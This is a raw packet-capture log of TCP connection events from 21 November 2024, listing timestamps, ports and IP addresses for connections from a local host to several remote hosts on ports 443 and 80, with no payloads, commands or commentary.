                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.226136923 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.226253033 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.398494959 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.444881916 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.518560886 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.518573999 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.519172907 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.519177914 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.519517899 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.519565105 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.519978046 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.519994974 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.520265102 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.520339012 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.520617962 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.520633936 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.521090031 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.521106958 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.521483898 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.521491051 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.521735907 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.521764040 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.522227049 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.522232056 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.841037035 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.841236115 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.841316938 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.841465950 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.841465950 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.841487885 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.841499090 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.845257998 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.845355034 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.845438004 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.845722914 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.845760107 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.847078085 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.847234964 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.847292900 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.847309113 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.847321987 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.847338915 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.847346067 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.847994089 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.848217964 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.848289967 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.848340034 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.848340034 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.848367929 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.848391056 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.850533009 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.850610971 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.850688934 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.851469040 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.851558924 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.851630926 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.851689100 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.851744890 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.851906061 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.851937056 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.857052088 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.857191086 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.857270002 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.857270002 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.857341051 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.857374907 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.859101057 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.859164953 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.859235048 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.859386921 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.859404087 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.859672070 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.859833956 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.859895945 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.859925032 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.859930992 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.859976053 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.859980106 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.862082958 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.862148046 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.862214088 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.862323046 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:20.862356901 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.041949987 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.042284012 CET4979680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.161741972 CET8049796185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.161915064 CET4979680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.162122965 CET4979680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.162141085 CET8049764185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.162224054 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.289203882 CET8049796185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.637799025 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.638647079 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.638725042 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.639252901 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.639266968 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.651211023 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.651856899 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.651885033 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.652471066 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.652478933 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.704962969 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.708087921 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.708103895 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.708532095 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.708537102 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.721155882 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.721735954 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.721770048 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.722213984 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.722220898 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.728579998 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.729079962 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.729099989 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.729495049 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:22.729500055 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.080877066 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.080971003 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.081070900 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.081778049 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.081816912 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.081855059 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.081870079 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.096728086 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.096812963 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.096898079 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.105932951 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.105958939 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.106050968 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.130070925 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.130086899 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.130141020 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.130150080 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.143002987 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.143035889 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.158438921 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.158559084 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.158653975 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.167047977 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.167057991 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.167068958 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.167074919 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.176991940 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.177150965 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.177227020 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.183523893 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.183757067 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.183840990 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.184856892 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.184897900 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.184971094 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.193203926 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.193229914 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.193248987 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.193255901 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.195261002 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.195269108 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.195281029 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.195285082 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.196938038 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.196955919 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.206589937 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.206617117 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.206705093 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.210069895 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.210103989 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.292038918 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.292099953 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.292198896 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.303812027 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.303850889 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.304682970 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.304722071 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.304811001 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.304944038 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.304958105 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.568960905 CET8049796185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.570866108 CET4979680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.579227924 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.698826075 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.698901892 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.700779915 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.820403099 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.871803999 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.991849899 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.994966030 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:23.996134043 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.115922928 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.857881069 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.859499931 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.859541893 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.860024929 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.860032082 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.925008059 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.927320004 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.927330017 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.927805901 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.927810907 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.985719919 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.987850904 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.987915039 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.988435030 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:24.988449097 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.024068117 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.027416945 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.027446032 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.027849913 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.027857065 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.077708006 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.077775002 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.077979088 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.078355074 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.078413010 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.078490973 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.078521013 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.078577042 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.079674959 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.079730988 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.079761028 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.079802990 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.079854965 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.080142975 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.080234051 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.080296993 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.104820013 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.107273102 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.107296944 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.107824087 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.107827902 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.197590113 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.197647095 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.197851896 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.201744080 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.202848911 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.203474998 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.203564882 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.203630924 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.279468060 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.279556990 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.279557943 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.279613018 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.283714056 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.283792019 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.283835888 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.287002087 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.292510986 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.292566061 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.292612076 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.292645931 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.293456078 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.293561935 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.293627024 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.293803930 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.293838978 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:25.293867111 CET49797443192.168.2.413.107.246.45
